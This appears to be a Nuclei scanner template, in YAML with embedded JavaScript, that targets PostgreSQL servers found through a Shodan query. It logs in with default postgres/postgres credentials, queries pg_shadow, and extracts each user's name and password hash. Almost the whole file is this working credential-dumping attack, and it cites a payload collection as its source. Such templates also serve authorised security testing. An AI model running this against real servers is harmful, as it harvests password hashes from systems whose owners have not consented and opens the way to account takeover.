42 lines
1.1 KiB
YAML
42 lines
1.1 KiB
YAML
|
id: pgsql-exec
|
||
|
|
||
|
info:
|
||
|
name: PostgreSQL List Password Hashes
|
||
|
author: pussycat0x
|
||
|
severity: info
|
||
|
description: |
|
||
|
PostgreSQL List Password Hashes
|
||
|
reference:
|
||
|
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
|
||
|
- https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
|
||
|
metadata:
|
||
|
shodan-query: product:"PostgreSQL"
|
||
|
tags: js,network,postgresql
|
||
|
|
||
|
javascript:
|
||
|
- code: |
|
||
|
const postgres = require('nuclei/postgres');
|
||
|
const client = new postgres.PGClient;
|
||
|
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow");
|
||
|
Export(connected)
|
||
|
args:
|
||
|
Host: "{{Host}}"
|
||
|
Port: 5432
|
||
|
User: "{{usernames}}"
|
||
|
Pass: "{{password}}"
|
||
|
Db: "{{database}}"
|
||
|
|
||
|
payloads:
|
||
|
usernames:
|
||
|
- postgres
|
||
|
database:
|
||
|
- postgres
|
||
|
password:
|
||
|
- postgres
|
||
|
|
||
|
attack: clusterbomb
|
||
|
|
||
|
extractors:
|
||
|
- type: json
|
||
|
json:
|
||
|
- '.Rows[] | "\(.usename) : \(.passwd)"'
|